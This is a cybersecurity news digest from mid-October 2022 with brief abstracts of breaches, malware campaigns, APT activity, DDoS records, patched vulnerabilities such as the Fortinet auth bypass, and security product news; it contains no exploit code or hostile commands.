With each passing year, the cybersecurity threat landscape continues to worsen. That reality makes cybersecurity analysts some of the most sought-after technology professionals in the world. And there are nowhere near enough of them to meet the demand. At last count, there were over 3.5 million unfilled cybersecurity jobs worldwide — and that number is still growing. The situation means that it's a great time to become a cybersecurity analyst. What's more, the skyrocketing demand means it's possible to start a lucrative freelance career in the field and take complete control over your professional future. Here's a start-to-finish guide on how to do exactly that. Start With the Right Training: The first step on the path to becoming a freelance cybersecurity analyst is to acquire the necessary skills. For those without an existing technology background, the best place to start is with a cybersecurity bootcamp. They're designed to get newcomers up to speed with ba... (The Hacker News)
October 14, 2022 – Breach
DJI drone tracking data exposed in the US Full Text
Abstract
Over 80,000 drone IDs were exposed in the leak of a database containing information from airspace monitoring devices manufactured by DJI. Original post at CyberNews: https://cybernews.com/privacy/dji-drone-tracking-data-exposed-in-us/ Over 80,000... (Security Affairs)
October 14, 2022 – Government
CISA releases open-source ‘RedEye’ C2 log visualization tool Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has announced RedEye, an open-source analytic tool for operators to visualize and report command and control (C2) activity. (BleepingComputer)
October 14, 2022 – Breach
DJI drone tracking data exposed in the US Full Text
Abstract
Over 80,000 drone IDs were exposed in a data leak after a database containing information from dozens of airspace monitoring devices manufactured by the Chinese-owned DJI was left accessible to the public. (Security Affairs)
October 14, 2022 – Criminals
INTERPOL arrests ‘Black Axe’ cybercrime syndicate members Full Text
Abstract
INTERPOL has arrested over 70 suspected members of the 'Black Axe' cybercrime syndicate, with two believed to be responsible for $1.8 million in financial fraud. (BleepingComputer)
October 14, 2022 – Breach
Australian police secret agents exposed in Colombian data leak Full Text
Abstract
Identities of secret agents working for the Australian Federal Police (AFP) have been exposed after hackers leaked documents stolen from the Colombian government. (BleepingComputer)
October 14, 2022 – Vulnerabilities
Microsoft Office 365 email encryption could expose message content Full Text
Abstract
Security researchers at WithSecure have discovered it's possible to partially or fully infer the contents of encrypted messages sent through Microsoft Office 365, highlighting an intrinsic weakness in the encryption scheme used. (BleepingComputer)
October 14, 2022 – Hacker
Operators Behind IcedID Trojan Diversify their Delivery Tactics Full Text
Abstract
Threat actors behind the IcedID malware have been found using a variety of propagation methods, including changing the management of C2 server IPs, in their phishing campaigns. The attackers were found registering fresh domains for C2, instead of relying on the old ones. (Cyware Alerts - Hacker News)
October 14, 2022 – Botnet
Mirai Botnet Hits Wynncraft Minecraft Server with 2.5 Tbps DDoS Attack Full Text
Abstract
Web infrastructure and security company Cloudflare disclosed this week that it halted a 2.5 Tbps distributed denial-of-service (DDoS) attack launched by a Mirai botnet. Characterizing it as a "multi-vector attack consisting of UDP and TCP floods," researcher Omer Yoachimik said the DDoS attack targeted the Minecraft server Wynncraft in Q3 2022. "The entire 2.5 Tbps attack lasted about 2 minutes, and the peak of the 26 million rps attack [was] only 15 seconds," Yoachimik noted. "This is the largest attack we've ever seen from the bitrate perspective." Cloudflare also pointed to a surge in multi-terabit DDoS attacks as well as longer-lasting volumetric attacks during the time period, not to mention an uptick in attacks targeting Taiwan and Japan. The disclosure comes almost 10 months after Microsoft said it thwarted a record-breaking 3.47 Tbps DDoS attack in November 2021 directed against an unnamed Azure customer in Asia. Other DDoS attacks... (The Hacker News)
October 14, 2022 – Government
Cobalt Strike Infections Haunt Healthcare - Warns HHS Full Text
Abstract
Tens of thousands of organizations each year are now affected by a hack involving Cobalt Strike, warned HHS. Apart from using Cobalt Strike, threat actors are using PowerShell, Mimikatz, Sysinternals, Brute Ratel, and Anydesk against healthcare facilities. State-sponsored threat actors, mostly the... (Cyware Alerts - Hacker News)
October 14, 2022 – Malware
PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks Full Text
Abstract
A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches. "FortiOS exposes a management web portal that allows a user to configure the system," Horizon3.ai researcher James Horseman said. "Additionally, a user can SSH into the system which exposes a locked down CLI interface." The issue, tracked as CVE-2022-40684 (CVSS score: 9.6), concerns an authentication bypass vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests. A successful exploitation of the shortcoming is tantamount to granting complete access "to do just about anything" on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic. That said,... (The Hacker News)
October 13, 2022 – Attack
Fast Company says Executive Board member info was not stolen in attack Full Text
Abstract
American business magazine Fast Company reached out to its Executive Board members this week to let them know their personal information was not stolen in a September 27 cyberattack that forced it to shut down its website. (BleepingComputer)
October 13, 2022 – General
Clarifying Responsible Cyber Power: Developing Views in the U.K. Regarding Non-intervention and Peacetime Cyber Operations Full Text
Abstract
A response to a previous Lawfare article on the U.K.'s cyber strategy, emphasizing the need to develop a nuanced, incremental development of that strategy over time. (Lawfare)
October 13, 2022 – APT
China-linked Budworm APT returns to target a US entity Full Text
Abstract
The Budworm espionage group resurfaced targeting a U.S.-based organization for the first time, Symantec Threat Hunter team reported. The Budworm cyber espionage group (aka APT27, Bronze Union, Emissary Panda, Lucky Mouse, TG-3390, and Red Phoenix)... (Security Affairs)
October 13, 2022 – Malware
Exploit available for critical Fortinet auth bypass bug, patch now Full Text
Abstract
Proof-of-concept exploit code is now available for a critical authentication bypass vulnerability affecting Fortinet's FortiOS, FortiProxy, and FortiSwitchManager appliances. (BleepingComputer)
October 13, 2022 – Denial Of Service
Cloudflare blocked a 2.5 Tbps DDoS attack aimed at the Minecraft server Full Text
Abstract
Cloudflare mitigated a record distributed denial-of-service (DDoS) attack against Wynncraft, one of the largest Minecraft servers. Cloudflare announced it has mitigated a record distributed denial-of-service (DDoS) attack against Wynncraft, one of the largest... (Security Affairs)
October 13, 2022 – Denial Of Service
Russian DDoS attack project pays contributors for more firepower Full Text
Abstract
A pro-Russian group created a crowdsourced project called 'DDOSIA' that pays volunteers launching distributed denial-of-service (DDOS) attacks against western entities. (BleepingComputer)
October 13, 2022 – Criminals
Celsius Exchange Data Dump Is a Gift to Crypto Sleuths—and Thieves Full Text
Abstract
Last week, Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing. (Wired)
October 13, 2022 – Malware
New Chinese Malware Attack Framework Targets Windows, macOS, and Linux Systems Full Text
Abstract
A previously undocumented command-and-control (C2) framework dubbed Alchimist is likely being used in the wild to target Windows, macOS, and Linux systems. "Alchimist C2 has a web interface written in Simplified Chinese and can generate a configured payload, establish remote sessions, deploy payload to the remote machines, capture screenshots, perform remote shellcode execution, and run arbitrary commands," Cisco Talos said in a report shared with The Hacker News. Written in GoLang, Alchimist is complemented by a beacon implant called Insekt, which comes with remote access features that can be instrumented by the C2 server. The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another self-contained framework known as Manjusaka, which has been touted as the "Chinese sibling of Sliver and Cobalt Strike." Even more interestingly, both Manjusaka and Alchimist pack in similar functionalities, desp... (The Hacker News)
October 13, 2022 – Malware
The discovery of Alchimist C2 tool, revealed a new attack framework to target Windows, macOS, and Linux systems Full Text
Abstract
Experts discovered a new attack framework, including a C2 tool dubbed Alchimist, used in attacks against Windows, macOS, and Linux systems. Researchers from Cisco Talos discovered a new, previously undocumented attack framework that included a C2 dubbed... (Security Affairs)
October 13, 2022 – Ransomware
Magniber ransomware now infects Windows users via JavaScript files Full Text
Abstract
A recent malicious campaign delivering Magniber ransomware has been targeting Windows home users with fake security updates. (BleepingComputer)
October 13, 2022 – Outage
Australia’s Medibank reports cyber incident, shares on trading halt Full Text
Abstract
The company said it took "immediate steps to contain the incident, and engaged specialized cybersecurity firms", adding that there was no evidence that any sensitive data, including customer data, had been accessed at this stage. (Reuters)
October 13, 2022 – Vulnerabilities
New Timing Attack Against NPM Registry API Could Expose Private Packages Full Text
Abstract
A novel timing attack discovered against the npm's registry API can be exploited to potentially disclose private packages used by organizations, putting developers at risk of supply chain threats. "By creating a list of possible package names, threat actors can detect organizations' scoped private packages and then masquerade public packages, tricking employees and users into downloading them," Aqua Security researcher Yakir Kadkoda said. The Scoped Confusion attack banks on analyzing the time it takes for the npm API (registry.npmjs[.]org) to return an HTTP 404 error message when querying for a private package, and measuring it against the response time for a non-existing module. "It takes on average less time to get a reply for a private package that does not exist compared to a private package that does," Kadkoda explained. The idea, ultimately, is to identify packages internally used by companies, which could then be used by threat actors to... (The Hacker News)
October 13, 2022 – APT
POLONIUM APT targets Israel with a new custom backdoor dubbed PapaCreep Full Text
Abstract
An APT group tracked as Polonium employed custom backdoors in attacks aimed at Israeli entities since at least September 2021. POLONIUM APT focused only on Israeli targets; it launched attacks against more than a dozen organizations in various industries,... (Security Affairs)
October 13, 2022 – Education
What the Uber Hack can teach us about navigating IT Security Full Text
Abstract
The recent Uber cyberattack shows us the myriad tactics employed by threat actors to breach corporate networks. Learn more about these tactics used and how to navigate IT Security. (BleepingComputer)
October 13, 2022 – Hacker
Budworm Espionage Group Returns to Targeting U.S. Organizations Full Text
Abstract
Budworm’s main payload continues to be the HyperBro malware family, which is often loaded using a technique known as DLL side-loading. This involves the attackers placing a malicious DLL in a directory where a legitimate DLL is expected to be found. (Symantec)
October 13, 2022 – General
Does the OWASP Top 10 Still Matter? Full Text
Abstract
What is the OWASP Top 10, and – just as important – what is it not? In this review, we look at how you can make this critical risk report work for you and your organisation. What is OWASP? OWASP is the Open Web Application Security Project, an international non-profit organization dedicated to improving web application security. It operates on the core principle that all of its materials are freely available and easily accessible online, so that anyone anywhere can improve their own web app security. It offers a number of tools, videos, and forums to help you do this – but their best-known project is the OWASP Top 10. The top 10 risks: The OWASP Top 10 outlines the most critical risks to web application security. Put together by a team of security experts from all over the world, the list is designed to raise awareness of the current security landscape and offer developers and security professionals invaluable insights into the latest and most widespread security risks. It al... (The Hacker News)
October 13, 2022 – Malware
YoWhatsApp, unofficial WhatsApp Android app spreads the Triada Trojan Full Text
Abstract
Kaspersky researchers warn of a recently discovered malicious version of a popular WhatsApp messenger mod dubbed YoWhatsApp. Kaspersky researchers discovered an unofficial WhatsApp Android application named 'YoWhatsApp' that steals access keys... (Security Affairs)
October 13, 2022 – Denial Of Service
Cloudflare mitigated record DDoS attack against Minecraft server Full Text
Abstract
Wynncraft, one of the largest Minecraft servers, was recently hit by a 2.5 Tbps distributed denial-of-service (DDoS) attack. (BleepingComputer)
October 13, 2022 – Hacker
New Alchimist Attack Framework Written in Chinese for Mac, Linux, and Windows Full Text
Abstract
Cisco Talos discovered a new attack framework including a command and control (C2) tool called "Alchimist" and a new malware "Insekt" with remote administration capabilities. (Cisco Talos)
October 13, 2022 – Hacker
Budworm Hackers Resurface with New Espionage Attacks Aimed at U.S. Organization Full Text
Abstract
An advanced persistent threat (APT) actor known as Budworm targeted a U.S.-based entity for the first time in more than six years, according to latest research. The attack was aimed at an unnamed U.S. state legislature, the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. Other "strategically significant" intrusions mounted over the past six months were directed against a government of a Middle Eastern country, a multinational electronics manufacturer, and a hospital in South East Asia. Budworm, also called APT27, Bronze Union, Emissary Panda, Lucky Mouse, and Red Phoenix, is a threat actor that's believed to operate on behalf of China through attacks that leverage a mix of custom and openly available tools to exfiltrate information of interest. "Bronze Union maintains a high degree of operational flexibility in order to adapt to the environments it operates in," Secureworks notes in a profile of... (The Hacker News)
October 13, 2022 – General
New Alchimist attack framework targets Windows, macOS, Linux Full Text
Abstract
Cybersecurity researchers have discovered a new attack and C2 framework called 'Alchimist,' which appears to be actively used in attacks targeting Windows, Linux, and macOS systems. (BleepingComputer)
October 13, 2022 – APT
New Chinese APT Targets IT Service Providers and Telcos with Signed Malware Full Text
Abstract
As the toolset itself appears to be shared among several actors, it is unclear whether this is a new iteration of operation “Shadow Force” or simply a different actor utilizing similar TTPs. (SentinelOne)
October 13, 2022 – Malware
Modified WhatsApp App Caught Infecting Android Devices with Malware Full Text
Abstract
An unofficial version of the popular WhatsApp messaging app called YoWhatsApp has been observed deploying an Android trojan known as Triada. The goal of the malware is to steal the keys that "allow the use of a WhatsApp account without the app," Kaspersky said in a new report. "If the keys are stolen, a user of a malicious WhatsApp mod can lose control over their account." YoWhatsApp offers the ability for users to lock chats, send messages to unsaved numbers, and customize the app with a variety of theming options. It's also said to share overlaps with other modded WhatsApp clients such as FMWhatsApp and HeyMods. The Russian cybersecurity company said it found the malicious functionality in YoWhatsApp version 2.22.11.75. Typically spread through fraudulent ads on Snaptube and Vidmate, the app, upon installation, requests the victims to grant it permissions to access SMS messages, enabling the malware to enroll them to paid subscriptions without their... (The Hacker News)
October 13, 2022 – Attack
Mango Markets Loses Over $100 Million in Flash Loan Attack Full Text
Abstract
Mango Markets took to Twitter Tuesday evening to tell users that it was investigating an incident “where a hacker was able to drain funds from Mango via… price manipulation.” (The Record)
October 12, 2022 – Solution
Microsoft adds new RSS feed for security update notifications Full Text
Abstract
Microsoft has now made it possible to receive notifications about new security updates through a new RSS feed for the Security Update Guide. (BleepingComputer)
October 12, 2022 – Phishing
Phishing Campaigns Made Easy, Courtesy Caffeine Full Text
Abstract
A new phishing-as-a-service, dubbed Caffeine, was found offering open registration and customer service support for newbies to help them launch their own campaigns. It's a bit pricey, but what makes a Caffeine subscription 3–5 times costlier than its contemporaries is that it offers anti-detectio... (Cyware Alerts - Hacker News)
October 12, 2022 – Phishing
Hackers Using Vishing to Trick Victims into Installing Android Banking Malware Full Text
Abstract
Malicious actors are resorting to voice phishing (vishing) tactics to dupe victims into installing Android malware on their devices, new research from ThreatFabric reveals. The Dutch mobile security company said it identified a network of phishing websites targeting Italian online-banking users that are designed to get hold of their contact details. Telephone-oriented attack delivery (TOAD), as the social engineering technique is called, involves calling the victims using previously collected information from fraudulent websites. The caller, who purports to be a support agent for the bank, instructs the individual, on the other hand, to install a security app and grant it extensive permissions, when, in reality, it's malicious software intended to gain remote access or conduct financial fraud. In this case, it leads to the deployment of an Android malware dubbed Copybara, a mobile trojan that was first detected in November 2021 and is primarily used to perform on-device fraud via o... (The Hacker News)
October 12, 2022 – Vulnerabilities
Aruba fixes critical vulnerabilities in EdgeConnect Enterprise Orchestrator Full Text
Abstract
Aruba addressed multiple critical severity vulnerabilities in the EdgeConnect Enterprise Orchestrator. Aruba addressed multiple critical severity vulnerabilities in the EdgeConnect Enterprise Orchestrator that can be exploited by remote attackers... (Security Affairs)
October 12, 2022 – Malware
Unofficial WhatsApp Android app caught stealing users’ accounts Full Text
Abstract
A new version of an unofficial WhatsApp Android application named 'YoWhatsApp' has been found stealing access keys for users' accounts. (BleepingComputer)
October 12, 2022 – Botnet
PseudoManuscrypt Botnet Evolves to Infect More Systems Full Text
Abstract
The relatively new PseudoManuscrypt botnet made some changes to its C2 infrastructure that enabled the threat actors to infect nearly 500,000 systems across 40 countries in the past eight months. Previously, Kaspersky had reported a similar technique being used by different malware families such as So... (Cyware Alerts - Hacker News)
October 12, 2022 – Solution
Scribe Platform: End-to-end Software Supply Chain Security Full Text
Abstract
As software supply chain security becomes more and more crucial, security, DevSecOps, and DevOps teams are more challenged than ever to build transparent trust in the software they deliver or use. In fact, Gartner recently published their 2022 cybersecurity predictions - not only do they anticipate the continued expansion of attack surfaces in the near future, they also list digital supply chain as a major rising attack surface and one of the top trends to follow in 2022. After all, any software is only as secure as the weakest link in its supply chain. One bad component, any malicious access to your development environment—or any vulnerability in your software's delivery life cycle—and you risk your code's integrity, your customers, and your reputation. Scribe Security recently launched a new platform that claims to address these urgent needs by enabling its users to build trust in their software across teams and organizations. According to Scribe Security, SBOM is a b... (The Hacker News)
October 12, 2022 – Vulnerabilities
Microsoft Patch Tuesday for October 2022 doesn’t fix Exchange Server flaws Full Text
Abstract
Microsoft Patch Tuesday security updates for October 2022 addressed a total of 85 security vulnerabilities, including an actively exploited zero-day. Microsoft Patch Tuesday security updates for October 2022 addressed 85 new vulnerabilities in multiple... (Security Affairs)
October 12, 2022 – Solution
Microsoft Defender adds command and control traffic detection Full Text
Abstract
Microsoft has added command-and-control (C2) traffic detection capabilities to its Microsoft Defender for Endpoint (MDE) enterprise endpoint security platform. (BleepingComputer)
October 12, 2022 – Denial Of Service
What Shaped the DDoS Landscape so Far this Year? Full Text
Abstract
Today, we take a look at the new DDoS trends formed this year as the geopolitical situation in Eastern Europe continues to shape the nature and intensity of DDoS attacks. The first half of the year has witnessed multiple attacks on financial and government institutions. Last month, the LockBit ranso... (Cyware Alerts - Hacker News)
October 12, 2022 – Solution
Google Rolling Out Passkey Passwordless Login Support to Android and Chrome Full Text
Abstract
Google on Wednesday officially rolled out support for passkeys, the next-generation authentication standard, to both Android and Chrome. "Passkeys are a significantly safer replacement for passwords and other phishable authentication factors," the tech giant said. "They cannot be reused, don't leak in server breaches, and protect users from phishing attacks." The feature was first announced in May 2022 as part of a broader push to support a common passwordless sign-in standard. Passkeys, established by the FIDO Alliance and also backed by Apple and Microsoft, aim to replace standard passwords with unique digital keys that are stored locally on the device. To that end, creating a passkey requires confirmation from the end-user about the account that will be used to log in to the online service, followed by using their biometric information or the device passcode. Signing in to a website on a mobile device is also a simple two-step process that e... (The Hacker News)
October 12, 2022 – Vulnerabilities
VMware has yet to fix CVE-2021-22048 flaw in vCenter Server disclosed one year ago Full Text
Abstract
VMware has yet to address the CVE-2021-22048 privilege escalation vulnerability in vCenter Server disclosed in November 2021. VMware warns customers that it has yet to address a high-severity privilege escalation vulnerability, tracked as CVE-2021-22048,... (Security Affairs)
October 12, 2022 – Vulnerabilities
Aruba fixes critical RCE and auth bypass flaws in EdgeConnect Full Text
Abstract
Aruba has released security updates for the EdgeConnect Enterprise Orchestrator, addressing multiple critical severity vulnerabilities that enable remote attackers to compromise the host. (BleepingComputer)
October 12, 2022 – Business
Vista Equity Partners acquires KnowBe4 for $4.6 billion in cash Full Text
Abstract
KnowBe4 has entered into a definitive agreement to be acquired by Vista Equity Partners in an all-cash transaction valued at approximately $4.6 billion on an equity value basis. (Help Net Security)
October 12, 2022 – Breach
64,000 Additional Patients Impacted by Omnicell Data Breach - What is Your Data Breach Action Plan? Full Text
Abstract
In April 2022, Omnicell reported a data breach affecting nearly 62,000 patients. The company has revealed that the incident has impacted an additional 64,000 individuals. This brings the total number of patients affected to over 126,000. Will you be the next victim like Omnicell? If you are overlooking the importance of data protection, attackers can get you in no time. Explore the impact of the data breach on the healthcare sector and what preventive measures can be taken against such attacks. Omnicell Announced Data Breach: Founded in 1992, Omnicell is a leading provider of medication management solutions for hospitals, long-term care facilities, and retail pharmacies. On May 4, 2022, Omnicell's IT systems and third-party cloud services were affected by ransomware attacks which may lead to data security concerns for employees and patients. While it is still early in the investigation, this appears to be a severe breach with potentially significant consequences for the... (The Hacker News)
October 12, 2022 – Ransomware
LockBit affiliates compromise Microsoft Exchange servers to deploy ransomware Full Text
Abstract
Lockbit ransomware affiliates are compromising Microsoft Exchange servers to deploy their ransomware, experts warn. South-Korean cybersecurity firm AhnLab reported that Lockbit ransomware affiliates are distributing their malware via compromised Microsoft... (Security Affairs)
October 12, 2022 – General
New npm timing attack could lead to supply chain attacks Full Text
Abstract
Security researchers have discovered an npm timing attack that reveals the names of private packages so threat actors can release malicious clones publicly to trick developers into using them instead. (BleepingComputer)
October 12, 2022 – Business
Cyber training platform pulls in another $66M after post-pandemic remote working increases cyber threats Full Text
Abstract
Ten Eleven Ventures led the latest round, while existing investors Goldman Sachs Asset Management, Summit Partners, Insight Partners, Menlo Ventures, and Citi Ventures all participated in the round. (TechCrunch)
October 12, 2022 – Vulnerabilities
Critical Bug in Siemens SIMATIC PLCs Could Let Attackers Steal Cryptographic Keys Full Text
Abstract
A vulnerability in Siemens Simatic programmable logic controllers (PLCs) can be exploited to retrieve the hard-coded, global private cryptographic keys and seize control of the devices. "An attacker can use these keys to perform multiple advanced attacks against Siemens SIMATIC devices and the related TIA Portal, while bypassing all four of its access level protections," industrial cybersecurity company Claroty said in a new report. "A malicious actor could use this secret information to compromise the entire SIMATIC S7-1200/1500 product line in an irreparable way." The critical vulnerability, assigned the identifier CVE-2022-38465, is rated 9.3 on the CVSS scoring scale and has been addressed by Siemens as part of security updates issued on October 11, 2022. The list of impacted products and versions is below - SIMATIC Drive Controller family (all versions before 2.9.2) SIMATIC ET 200SP Open Controller CPU 1515SP PC2, including SIPLUS variants (all... (The Hacker News)
October 12, 2022 – Solution
Google simplifies sign-ins with Chrome, Android passkey support Full Text
Abstract
Google announced today that it's introducing passkey support to both its Google Chrome web browser and the Android operating system to simplify sign-ins across apps, websites, and devices. (BleepingComputer)
October 12, 2022 – Vulnerabilities
Chrome 106 Update Patches Several High-Severity Vulnerabilities Full Text
Abstract
Based on the bug bounty amounts that Google has paid out, the most severe of the newly addressed flaws is CVE-2022-3445, a use-after-free vulnerability in Skia, the open-source 2D graphics library that serves as Chrome’s graphics engine. (Security Week)
October 12, 2022 – Vulnerabilities
Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs Full Text
Abstract
Microsoft's Patch Tuesday update for the month of October has addressed a total of 85 security vulnerabilities, including fixes for an actively exploited zero-day flaw in the wild. Of the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the actively exploited ProxyNotShell flaws in Exchange Server. The patches come alongside updates to resolve 12 other flaws in the Chromium-based Edge browser that have been released since the beginning of the month. Topping the list of this month's patches is CVE-2022-41033 (CVSS score: 7.8), a privilege escalation vulnerability in Windows COM+ Event System Service. An anonymous researcher has been credited with reporting the issue. "An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," the company said in an advisory, cautioning that the shortcoming is being actively weaponized in... (The Hacker News)
October 12, 2022 – Phishing
Google Forms abused in new COVID-19 phishing wave in the U.S. Full Text
Abstract
COVID-19-themed phishing messages are once again spiking in the U.S. following a prolonged summer hiatus that appears to be over. (BleepingComputer)
October 12, 2022 – General
Election workers in battleground states faced onslaught of malicious emails, researchers say Full Text
Abstract
County election workers in Arizona and Pennsylvania were inundated with a “surge” in malicious emails ahead of those states’ August primaries, researchers said Wednesday, highlighting the ongoing threat facing election officials before midterms. (CyberScoop)
October 12, 2022 – Criminals
Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike Full Text
Abstract
Brute Ratel is a commercial (paid) Adversary Emulation framework and a relative newcomer to the commercial C&C Framework space, where it competes with more established players such as Cobalt Strike. (Trend Micro)
October 11, 2022 – Solution
All Windows versions can now block admin brute-force attacks Full Text
Abstract
Microsoft announced today that IT admins can now configure any Windows system still receiving security updates to automatically block brute force attacks targeting local administrator accounts via a group policy.BleepingComputer
October 11, 2022 – Government
Feds Warn Healthcare Over Cobalt Strike Infections Full Text
Abstract
Cobalt Strike, whose legitimate user base consists of white hat hackers, is being abused "with increasing frequency" against many industries, including the healthcare and public health sector, by ransomware gangs and various APT groups, HC3 writes.Bank Info Security
October 11, 2022 – Phishing
BazarCall Callback Phishing Attacks Constantly Evolving Its Social Engineering Tactics Full Text
Abstract
The operators behind the BazaCall call back phishing method have continued to evolve with updated social engineering tactics to deploy malware on targeted networks. The scheme eventually acts as an entry point to conduct financial fraud or the delivery of next-stage payloads such as ransomware, cybersecurity company Trellix said in a report published last week. Primary targets of the latest attack waves include the U.S., Canada, China, India, Japan, Taiwan, the Philippines, and the U.K. BazaCall, also called BazarCall, first gained popularity in 2020 for its novel approach of distributing the BazarBackdoor (aka BazarLoader) malware by manipulating potential victims into calling a phone number specified in decoy email messages. These email baits aim to create a false sense of urgency, informing the recipients about renewal of a trial subscription for, say, an antivirus service. The messages also urge them to contact their support desk to cancel the plan, or risk getting automatThe Hacker News
October 11, 2022 – Phishing
Caffeine, a new Phishing-as-a-Service toolkit available in the underground Full Text
Abstract
Researchers warn of a new phishing-as-a-service (PhaaS) toolkit, called Caffeine, which is being used by cybercriminals. In March 2022, Mandiant researchers discovered threat actors using a shared Phishing-as-a-Service (PhaaS) platform called Caffeine....Security Affairs
October 11, 2022 – Vulnerabilities
Android leaks some traffic even when ‘Always-on VPN’ is enabled Full Text
Abstract
Mullvad VPN has discovered that Android leaks traffic every time the device connects to a WiFi network, even if the "Block connections without VPN" or "Always-on VPN" feature is enabled.BleepingComputer
October 11, 2022 – Vulnerabilities
Hidden DNS resolver insecurity creates widespread website hijack risk Full Text
Abstract
Closed DNS resolvers are used by numerous hosting providers and other internet service providers (ISPs) to provision services to their clients. As the name suggests, closed DNS resolvers reside on closed networks or intranets.The Daily Swig
October 11, 2022 – Vulnerabilities
Researchers Detail Critical RCE Flaw Reported in Popular vm2 JavaScript Sandbox Full Text
Abstract
A now-patched security flaw in the vm2 JavaScript sandbox module could be abused by a remote adversary to break out of security barriers and perform arbitrary operations on the underlying machine. "A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox," GitHub said in an advisory published on September 28, 2022. The issue, tracked as CVE-2022-36067 and codenamed Sandbreak, carries a maximum severity rating of 10 on the CVSS vulnerability scoring system. It has been addressed in version 3.9.11 released on August 28, 2022. vm2 is a popular Node library that's used to run untrusted code with allowlisted built-in modules. It's also one of the most widely downloaded software, accounting for nearly 3.5 million downloads per week. The shortcoming is rooted in the error mechanism in Node.js to escape the sandbox, according to application security firm Oxeye, which discovered the flaw. This meanThe Hacker News
October 11, 2022 – Hacker
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
Threat actors behind the Emotet bot are continually improving their tactics, techniques, and procedures to avoid detection. VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting...Security Affairs
October 11, 2022 – Vulnerabilities
VMware vCenter Server bug disclosed last year still not patched Full Text
Abstract
VMware informed customers today that vCenter Server 8.0 (the latest version) is still waiting for a patch to address a high-severity privilege escalation vulnerability disclosed in November 2021.BleepingComputer
October 11, 2022 – Deepfake
DeepFakes are the Cybercriminal Economy’s Latest Business Line Full Text
Abstract
Introduced to the public by Canadian researchers in 2014, Generative Adversarial Networks (GANs) typically imitate people's faces, speech, and unique facial gestures; they have become known to online communities as DeepFakes.Security Affairs
October 11, 2022 – General
The Latest Funding News and What it Means for Cyber Security in 2023 Full Text
Abstract
The White House has recently announced a $1 billion cyber security grant program that is designed to help state and local governments improve their cyber defenses, especially for protecting critical infrastructure. The recent executive order stems from the $1.2 trillion infrastructure bill that was signed almost a year ago. That bill allocated $1 billion for protecting critical infrastructure against cyber-attack in the wake of a series of high-profile ransomware attacks such as the one that brought down the Colonial Pipeline. Those government agencies who wish to take advantage of these funding opportunities must submit a grant proposal by mid-November. Proposals are only being accepted for the sixty days following the program's announcement. Grant recipients can use the funding to invest in new cybersecurity initiatives or to make improvements to existing defenses. Awardees are guaranteed to receive a minimum of $2 million. However, the program's requirements stipulThe Hacker News
October 11, 2022 – Criminals
DeepFakes Are The Cybercriminal Economy’s Latest Business Line Full Text
Abstract
California-based Resecurity has identified a new spike of underground services enabling bad actors to generate deepfakes. According to cybersecurity experts, this may be used for political propaganda, foreign influence activity, disinformation, scams,...Security Affairs
October 11, 2022 – Vulnerabilities
Microsoft October 2022 Patch Tuesday fixes zero-day used in attacks, 84 flaws Full Text
Abstract
Today is Microsoft's October 2022 Patch Tuesday, and with it comes fixes for an actively exploited Windows vulnerability and a total of 84 flaws.BleepingComputer
October 11, 2022 – Malware
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting their tactics, techniques, and procedures to avoid detection.Security Affairs
October 11, 2022 – Phishing
Researchers Warn of New Phishing-as-a-Service Being Used by Cyber Criminals Full Text
Abstract
Cyber criminals are using a previously undocumented phishing-as-a-service (PhaaS) toolkit called Caffeine to effectively scale up their attacks and distribute nefarious payloads. "This platform has an intuitive interface and comes at a relatively low cost while providing a multitude of features and tools to its criminal clients to orchestrate and automate core elements of their phishing campaigns," Mandiant said in a new report. Some of the core features offered by the platform comprise the ability to craft customized phishing kits, manage redirect pages, dynamically generate URLs that host the payloads, and track the success of the campaigns. The development comes a little over a month after Resecurity took the wraps off another PhaaS service dubbed EvilProxy that's offered for sale on dark web criminal forums. But unlike EvilProxy, whose operators are known to vet prospective customers before activating the subscriptions, Caffeine is notable for running an oThe Hacker News
October 11, 2022 – Breach
Toyota discloses accidental leak of some customers’ personal information Full Text
Abstract
Toyota Motor Corporation discloses data leak, customers' personal information may have been exposed after an access key was exposed on GitHub. Toyota Motor Corporation warns customers that their personal information may have been accidentally exposed...Security Affairs
October 11, 2022 – Ransomware
Microsoft Exchange servers hacked to deploy LockBit ransomware Full Text
Abstract
Microsoft is investigating reports of a new zero-day bug abused to hack Exchange servers which were later used to launch Lockbit ransomware attacks.BleepingComputer
October 11, 2022 – Hacker
POLONIUM Threat Group Targets Israeli Organizations with ‘Creepy’ Malware Full Text
Abstract
ESET researchers revealed their findings about POLONIUM, an advanced persistent threat (APT) group about which little information is publicly available and its initial compromise vector is unknown.ESET Security
October 11, 2022 – Vulnerabilities
Fortinet Warns of Active Exploitation of Newly Discovered Critical Auth Bypass Bug Full Text
Abstract
